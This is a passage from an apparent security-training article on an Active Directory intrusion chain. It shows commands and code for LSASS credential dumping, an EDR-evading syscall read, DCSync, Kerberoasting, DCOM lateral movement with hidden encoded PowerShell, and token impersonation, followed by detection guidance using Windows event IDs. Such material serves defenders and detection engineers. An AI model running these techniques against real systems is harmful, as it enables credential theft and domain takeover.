The individual misconfigurations (helpdesk having local admin on workstations, a DA account running as a service) are each defensible in isolation  together they form a chain.</p>\n<h3 class=\"anchor anchorTargetStickyNavbar_Vzrq\" id=\"stage-5-credential-dumping\">Stage 5: Credential Dumping<a href=\"https://inferencedefense.com/academy/blog-internal/apt-initial-access-to-domain-dominance-4-hours#stage-5-credential-dumping\" class=\"hash-link\" aria-label=\"Direct link to Stage 5: Credential Dumping\" title=\"Direct link to Stage 5: Credential Dumping\" translate=\"no\">​</a></h3>\n<p><strong>Method 1: LSASS via comsvcs.dll (no external tools)</strong></p>\n<div class=\"language-cmd codeBlockContainer_Ckt0 theme-code-block\" style=\"--prism-color:hsl(212, 13%, 16%);--prism-background-color:hsl(256, 12%, 98%)\"><div class=\"codeBlockContent_QJqH\"><pre tabindex=\"0\" class=\"prism-code language-cmd codeBlock_bY9V thin-scrollbar\" style=\"color:hsl(212, 13%, 16%);background-color:hsl(256, 12%, 98%)\"><code class=\"codeBlockLines_e6Vv\"><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\"># Get LSASS PID</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">tasklist /fi \"imagename eq lsass.exe\"</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\" style=\"display:inline-block\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\"># Dump via built-in Windows DLL  no Mimikatz binary needed</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">rundll32.exe C:\\Windows\\System32\\comsvcs.dll, MiniDump 612 C:\\Windows\\Temp\\lsass.dmp full</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\" style=\"display:inline-block\"></span><br></span><span class=\"token-line\" 
style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\"># Exfiltrate and parse offline with Mimikatz:</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">sekurlsa::minidump lsass.dmp</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">sekurlsa::logonpasswords</span><br></span></code></pre></div></div>\n<p>This uses a signed Microsoft DLL. No malware binary is written to disk.</p>\n<p><strong>Method 2: Direct syscall LSASS access (bypasses EDR hooks on OpenProcess)</strong></p>\n<div class=\"language-c codeBlockContainer_Ckt0 theme-code-block\" style=\"--prism-color:hsl(212, 13%, 16%);--prism-background-color:hsl(256, 12%, 98%)\"><div class=\"codeBlockContent_QJqH\"><pre tabindex=\"0\" class=\"prism-code language-c codeBlock_bY9V thin-scrollbar\" style=\"color:hsl(212, 13%, 16%);background-color:hsl(256, 12%, 98%)\"><code class=\"codeBlockLines_e6Vv\"><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token comment\" style=\"color:hsl(212, 9%, 47%);font-style:italic\">// Using direct NtReadVirtualMemory syscall stub</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\"></span><span class=\"token comment\" style=\"color:hsl(212, 9%, 47%);font-style:italic\">// EDR hooks on ReadProcessMemory in ntdll are bypassed</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">HANDLE hProc</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">;</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">OBJECT_ATTRIBUTES oa </span><span class=\"token operator\" style=\"color:hsl(212, 92%, 35%)\">=</span><span class=\"token plain\"> </span><span class=\"token 
punctuation\" style=\"color:hsl(212, 13%, 16%)\">{</span><span class=\"token number\" style=\"color:hsl(212, 92%, 35%)\">0</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">}</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">;</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">CLIENT_ID cid </span><span class=\"token operator\" style=\"color:hsl(212, 92%, 35%)\">=</span><span class=\"token plain\"> </span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">{</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">(</span><span class=\"token plain\">HANDLE</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">)</span><span class=\"token plain\">lsassPID</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">,</span><span class=\"token plain\"> </span><span class=\"token constant\" style=\"color:hsl(212, 92%, 35%)\">NULL</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">}</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">;</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\"></span><span class=\"token function\" style=\"color:hsl(256, 54%, 50%)\">NtOpenProcess</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">(</span><span class=\"token operator\" style=\"color:hsl(212, 92%, 35%)\">&amp;</span><span class=\"token plain\">hProc</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">,</span><span class=\"token plain\"> PROCESS_VM_READ </span><span class=\"token operator\" style=\"color:hsl(212, 92%, 35%)\">|</span><span class=\"token plain\"> PROCESS_QUERY_INFORMATION</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">,</span><span class=\"token 
plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">              </span><span class=\"token operator\" style=\"color:hsl(212, 92%, 35%)\">&amp;</span><span class=\"token plain\">oa</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">,</span><span class=\"token plain\"> </span><span class=\"token operator\" style=\"color:hsl(212, 92%, 35%)\">&amp;</span><span class=\"token plain\">cid</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">)</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">;</span><span class=\"token plain\">   </span><span class=\"token comment\" style=\"color:hsl(212, 9%, 47%);font-style:italic\">// direct syscall  no EDR hook</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\"></span><span class=\"token comment\" style=\"color:hsl(212, 9%, 47%);font-style:italic\">// Read LSASS memory regions containing credentials</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\"></span><span class=\"token function\" style=\"color:hsl(256, 54%, 50%)\">NtReadVirtualMemory</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">(</span><span class=\"token plain\">hProc</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">,</span><span class=\"token plain\"> baseAddr</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">,</span><span class=\"token plain\"> buffer</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">,</span><span class=\"token plain\"> size</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">,</span><span class=\"token plain\"> </span><span class=\"token operator\" style=\"color:hsl(212, 92%, 35%)\">&amp;</span><span class=\"token 
plain\">bytesRead</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">)</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">;</span><br></span></code></pre></div></div>\n<p><strong>Method 3: DCSync (requires Replicating Directory Changes All)</strong></p>\n<div class=\"language-text codeBlockContainer_Ckt0 theme-code-block\" style=\"--prism-color:hsl(212, 13%, 16%);--prism-background-color:hsl(256, 12%, 98%)\"><div class=\"codeBlockContent_QJqH\"><pre tabindex=\"0\" class=\"prism-code language-text codeBlock_bY9V thin-scrollbar\" style=\"color:hsl(212, 13%, 16%);background-color:hsl(256, 12%, 98%)\"><code class=\"codeBlockLines_e6Vv\"><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\"># Mimikatz  executed on any machine where the operator has sufficient privileges</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\"># Does NOT need to run on a DC</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">lsadump::dcsync /domain:corp.local /all /csv</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\" style=\"display:inline-block\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\"># OR for a specific account:</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">lsadump::dcsync /domain:corp.local /user:krbtgt</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\" style=\"display:inline-block\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\"># Output:</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">Object RDN           : krbtgt</span><br></span><span 
class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">** SAM ACCOUNT **</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">SAM Username         : krbtgt</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">Account Type         : 30000000 ( USER_OBJECT )</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\" style=\"display:inline-block\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">Credentials:</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">  Hash NTLM: 8846f7eaee8fb117ad06bdd830b7586c</span><br></span></code></pre></div></div>\n<p>With the <code>krbtgt</code> hash, the attacker can forge Kerberos tickets for any account in the domain  a <strong>Golden Ticket</strong>. The domain is fully compromised. 
Resetting <code>krbtgt</code> once is insufficient (it must be reset twice, 10 hours apart, to invalidate all forged tickets).</p>\n<p><strong>Method 4: Kerberoasting (offline, no LSASS access needed)</strong></p>\n<div class=\"language-powershell codeBlockContainer_Ckt0 theme-code-block\" style=\"--prism-color:hsl(212, 13%, 16%);--prism-background-color:hsl(256, 12%, 98%)\"><div class=\"codeBlockContent_QJqH\"><pre tabindex=\"0\" class=\"prism-code language-powershell codeBlock_bY9V thin-scrollbar\" style=\"color:hsl(212, 13%, 16%);background-color:hsl(256, 12%, 98%)\"><code class=\"codeBlockLines_e6Vv\"><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\"># Request service tickets for all Kerberoastable SPNs</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\"># Runs as any domain user  no elevated privileges required</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">Add-Type -AssemblyName System.IdentityModel</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">$spns = @(\"MSSQLSvc/sqlserver.corp.local:1433\",</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">          \"HTTP/webapp.corp.local\",</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">          \"backup/backupsrv.corp.local\")</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\" style=\"display:inline-block\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">foreach ($spn in $spns) {</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    $ticket = New-Object System.IdentityModel.Tokens.KerberosRequestorSecurityToken 
`</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">              -ArgumentList $spn</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    $ticketBytes = $ticket.GetRequest()</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    # Extract RC4/AES encrypted portion and submit to hashcat</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">}</span><br></span></code></pre></div></div>\n<p>Cracking with hashcat:</p>\n<div class=\"language-bash codeBlockContainer_Ckt0 theme-code-block\" style=\"--prism-color:hsl(212, 13%, 16%);--prism-background-color:hsl(256, 12%, 98%)\"><div class=\"codeBlockContent_QJqH\"><pre tabindex=\"0\" class=\"prism-code language-bash codeBlock_bY9V thin-scrollbar\" style=\"color:hsl(212, 13%, 16%);background-color:hsl(256, 12%, 98%)\"><code class=\"codeBlockLines_e6Vv\"><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">hashcat </span><span class=\"token parameter variable\" style=\"color:hsl(26, 100%, 29%)\">-m</span><span class=\"token plain\"> </span><span class=\"token number\" style=\"color:hsl(212, 92%, 35%)\">13100</span><span class=\"token plain\"> kerberoast_hashes.txt /usr/share/wordlists/rockyou.txt </span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">\\</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">        --rules-file /usr/share/hashcat/rules/best64.rule</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\" style=\"display:inline-block\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\"></span><span class=\"token comment\" style=\"color:hsl(212, 
9%, 47%);font-style:italic\"># Against weak passwords, expect cracks in seconds to minutes</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\"></span><span class=\"token comment\" style=\"color:hsl(212, 9%, 47%);font-style:italic\"># Strong service account passwords (25+ chars, random) are infeasible to crack</span><br></span></code></pre></div></div>\n<p>The defense is trivially simple: service account passwords should be 30+ character random strings, managed via Group Managed Service Accounts (gMSA). Yet Kerberoastable accounts with crackable passwords are found in virtually every enterprise AD environment.</p>\n<h3 class=\"anchor anchorTargetStickyNavbar_Vzrq\" id=\"stage-6-lateral-movement--dcom-in-detail\">Stage 6: Lateral Movement - DCOM in Detail<a href=\"https://inferencedefense.com/academy/blog-internal/apt-initial-access-to-domain-dominance-4-hours#stage-6-lateral-movement--dcom-in-detail\" class=\"hash-link\" aria-label=\"Direct link to Stage 6: Lateral Movement  DCOM in Detail\" title=\"Direct link to Stage 6: Lateral Movement  DCOM in Detail\" translate=\"no\">​</a></h3>\n<p>DCOM lateral movement is the technique for which most SOCs have inadequate detection coverage.</p>\n<p><strong>MMC20.Application object:</strong></p>\n<div class=\"language-powershell codeBlockContainer_Ckt0 theme-code-block\" style=\"--prism-color:hsl(212, 13%, 16%);--prism-background-color:hsl(256, 12%, 98%)\"><div class=\"codeBlockContent_QJqH\"><pre tabindex=\"0\" class=\"prism-code language-powershell codeBlock_bY9V thin-scrollbar\" style=\"color:hsl(212, 13%, 16%);background-color:hsl(256, 12%, 98%)\"><code class=\"codeBlockLines_e6Vv\"><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\"># From attacker-controlled host, targeting VICTIM-HOST</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">$com 
= [System.Activator]::CreateInstance(</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    [System.Type]::GetTypeFromProgID(\"MMC20.Application\", \"VICTIM-HOST\")</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">)</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\" style=\"display:inline-block\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\"># Execute arbitrary command on remote host  spawns under mmc.exe on target</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">$com.Document.ActiveView.ExecuteShellCommand(</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    \"cmd.exe\",</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    $null,</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    \"/c powershell -nop -w hidden -enc [BASE64_BEACON]\",</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    \"7\"   # window state: hidden</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">)</span><br></span></code></pre></div></div>\n<p><strong>ShellWindows / ShellBrowserWindow (execution appears under explorer.exe):</strong></p>\n<div class=\"language-powershell codeBlockContainer_Ckt0 theme-code-block\" style=\"--prism-color:hsl(212, 13%, 16%);--prism-background-color:hsl(256, 12%, 98%)\"><div class=\"codeBlockContent_QJqH\"><pre tabindex=\"0\" class=\"prism-code language-powershell codeBlock_bY9V thin-scrollbar\" style=\"color:hsl(212, 13%, 16%);background-color:hsl(256, 12%, 98%)\"><code 
class=\"codeBlockLines_e6Vv\"><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">$com = [System.Activator]::CreateInstance(</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    [System.Type]::GetTypeFromProgID(\"Shell.Application\", \"VICTIM-HOST\")</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">)</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">$item = $com.Windows() | Where-Object {$_.FullName -like \"*explorer*\"} | Select -First 1</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">$item.Document.Application.ShellExecute(</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    \"cmd.exe\",</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    \"/c powershell -nop -w hidden -enc [BASE64_BEACON]\",</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    \"C:\\Windows\\System32\",</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    $null,</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    0</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">)</span><br></span></code></pre></div></div>\n<p><strong>What this generates in Windows event logs on the target:</strong></p>\n<div class=\"language-text codeBlockContainer_Ckt0 theme-code-block\" style=\"--prism-color:hsl(212, 13%, 16%);--prism-background-color:hsl(256, 12%, 98%)\"><div class=\"codeBlockContent_QJqH\"><pre tabindex=\"0\" class=\"prism-code language-text codeBlock_bY9V thin-scrollbar\" style=\"color:hsl(212, 
13%, 16%);background-color:hsl(256, 12%, 98%)\"><code class=\"codeBlockLines_e6Vv\"><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">Event ID: 4688 (Process Creation)</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">  Creator Process: C:\\Windows\\explorer.exe</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">  New Process:     C:\\Windows\\System32\\cmd.exe</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">  Command Line:    cmd.exe /c powershell -nop -w hidden -enc AAAA...</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">  Logon ID:        0x3E7</span><br></span></code></pre></div></div>\n<p>There is <strong>no</strong> Event ID 7045 (service installed), <strong>no</strong> 5140/5145 (share access), <strong>no</strong> 4648 (explicit credential logon if pass-the-hash is used). 
The two event IDs that most lateral movement detections are built around are absent.</p>\n<hr>\n<h2 class=\"anchor anchorTargetStickyNavbar_Vzrq\" id=\"section-3--what-telemetry-catches-and-what-it-silently-misses\">Section 3: What Telemetry Catches and What It Silently Misses<a href=\"https://inferencedefense.com/academy/blog-internal/apt-initial-access-to-domain-dominance-4-hours#section-3--what-telemetry-catches-and-what-it-silently-misses\" class=\"hash-link\" aria-label=\"Direct link to Section 3  What Telemetry Catches and What It Silently Misses\" title=\"Direct link to Section 3  What Telemetry Catches and What It Silently Misses\" translate=\"no\">​</a></h2>\n<h3 class=\"anchor anchorTargetStickyNavbar_Vzrq\" id=\"what-edr-catches-well\">What EDR Catches Well<a href=\"https://inferencedefense.com/academy/blog-internal/apt-initial-access-to-domain-dominance-4-hours#what-edr-catches-well\" class=\"hash-link\" aria-label=\"Direct link to What EDR Catches Well\" title=\"Direct link to What EDR Catches Well\" translate=\"no\">​</a></h3>\n<table><thead><tr><th>Technique</th><th>Detection Method</th><th>Reliability</th></tr></thead><tbody><tr><td>Default Cobalt Strike beacon</td><td>Memory scanning for beacon PE characteristics</td><td>High</td></tr><tr><td><code>CreateRemoteThread</code> injection</td><td>Sysmon Event ID 8, anomalous source/target</td><td>Medium-High</td></tr><tr><td>Direct <code>OpenProcess</code> to LSASS</td><td>Kernel callback instrumentation</td><td>High</td></tr><tr><td>Mimikatz binary on disk</td><td>AV signature</td><td>High</td></tr><tr><td>Common LOLBin abuse (<code>certutil</code>, <code>mshta</code>, <code>regsvr32</code>)</td><td>Process creation + command line</td><td>Medium</td></tr></tbody></table>\n<h3 class=\"anchor anchorTargetStickyNavbar_Vzrq\" id=\"where-detection-fails\">Where Detection Fails<a href=\"https://inferencedefense.com/academy/blog-internal/apt-initial-access-to-domain-dominance-4-hours#where-detection-fails\" 
class=\"hash-link\" aria-label=\"Direct link to Where Detection Fails\" title=\"Direct link to Where Detection Fails\" translate=\"no\">​</a></h3>\n<p><strong>Token impersonation - near-zero detection coverage:</strong></p>\n<p>When an attacker calls <code>ImpersonateLoggedOnUser</code> or duplicates a token via <code>DuplicateTokenEx</code> + <code>CreateProcessWithTokenW</code>, the resulting process inherits the victim's token. Event ID 4688 shows the impersonated user as the process creator; it looks like that user legitimately launched the process.</p>\n<div class=\"language-c codeBlockContainer_Ckt0 theme-code-block\" style=\"--prism-color:hsl(212, 13%, 16%);--prism-background-color:hsl(256, 12%, 98%)\"><div class=\"codeBlockContent_QJqH\"><pre tabindex=\"0\" class=\"prism-code language-c codeBlock_bY9V thin-scrollbar\" style=\"color:hsl(212, 13%, 16%);background-color:hsl(256, 12%, 98%)\"><code class=\"codeBlockLines_e6Vv\"><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token comment\" style=\"color:hsl(212, 9%, 47%);font-style:italic\">// Attacker runs as SYSTEM, impersonates Domain Admin token from a running session</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">HANDLE hDupToken</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">;</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\"></span><span class=\"token function\" style=\"color:hsl(256, 54%, 50%)\">DuplicateTokenEx</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">(</span><span class=\"token plain\">hToken</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">,</span><span class=\"token plain\"> TOKEN_ALL_ACCESS</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">,</span><span class=\"token plain\"> 
</span><span class=\"token constant\" style=\"color:hsl(212, 92%, 35%)\">NULL</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">,</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">                SecurityImpersonation</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">,</span><span class=\"token plain\"> TokenPrimary</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">,</span><span class=\"token plain\"> </span><span class=\"token operator\" style=\"color:hsl(212, 92%, 35%)\">&amp;</span><span class=\"token plain\">hDupToken</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">)</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">;</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\"></span><span class=\"token function\" style=\"color:hsl(256, 54%, 50%)\">CreateProcessWithTokenW</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">(</span><span class=\"token plain\">hDupToken</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">,</span><span class=\"token plain\"> </span><span class=\"token number\" style=\"color:hsl(212, 92%, 35%)\">0</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">,</span><span class=\"token plain\"> </span><span class=\"token string\" style=\"color:hsl(139, 66%, 32%)\">\"cmd.exe\"</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">,</span><span class=\"token plain\"> </span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">.</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">.</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">.</span><span class=\"token punctuation\" style=\"color:hsl(212, 
13%, 16%)\">)</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">;</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\"></span><span class=\"token comment\" style=\"color:hsl(212, 9%, 47%);font-style:italic\">// Event 4688: Creator = DA_username, Parent = legitimate process</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\"></span><span class=\"token comment\" style=\"color:hsl(212, 9%, 47%);font-style:italic\">// No anomaly signal at process level</span><br></span></code></pre></div></div>\n<p>Detection requires correlating the logon session ID of the created process against the process tree lineage; the logon ID is available in the Sysmon Event ID 1 <code>LogonId</code> field but rarely queried.</p>\n<p><strong>Pass-the-hash - the tell is a single field almost nobody checks:</strong></p>\n<div class=\"language-text codeBlockContainer_Ckt0 theme-code-block\" style=\"--prism-color:hsl(212, 13%, 16%);--prism-background-color:hsl(256, 12%, 98%)\"><div class=\"codeBlockContent_QJqH\"><pre tabindex=\"0\" class=\"prism-code language-text codeBlock_bY9V thin-scrollbar\" style=\"color:hsl(212, 13%, 16%);background-color:hsl(256, 12%, 98%)\"><code class=\"codeBlockLines_e6Vv\"><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">Event ID: 4624 (Logon)</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">  Logon Type: 3 (Network)</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">  Authentication Package: NTLM</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">  Logon Process: NtLmSsp</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">  
Workstation: ATTACKER-HOST</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">  Key Length: 0       &lt;-- THIS IS THE TELL</span><br></span></code></pre></div></div>\n<p>Key Length of 0 in a Type 3 NTLM logon indicates no session key was negotiated, a characteristic of pass-the-hash. This field is almost never included in standard SIEM correlation rules.</p>\n<p><strong>DCSync - only caught if audit policy is correct:</strong></p>\n<p>DCSync generates Event ID 4662 on the Domain Controller, but <strong>only</strong> if <code>Audit Directory Service Access</code> is enabled for success events, which most environments have disabled due to log volume.</p>\n<p>When enabled, the signal is unambiguous:</p>\n<div class=\"language-text codeBlockContainer_Ckt0 theme-code-block\" style=\"--prism-color:hsl(212, 13%, 16%);--prism-background-color:hsl(256, 12%, 98%)\"><div class=\"codeBlockContent_QJqH\"><pre tabindex=\"0\" class=\"prism-code language-text codeBlock_bY9V thin-scrollbar\" style=\"color:hsl(212, 13%, 16%);background-color:hsl(256, 12%, 98%)\"><code class=\"codeBlockLines_e6Vv\"><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">Event ID: 4662</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">  Object Type:  domainDNS</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">  Properties:   DS-Replication-Get-Changes</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">                DS-Replication-Get-Changes-All</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">  Subject:      CORP\\jsmith    &lt;-- should be a computer account, not a user</span><br></span></code></pre></div></div>\n<p>A 4662 event where the subject is a <strong>user account</strong> (not 
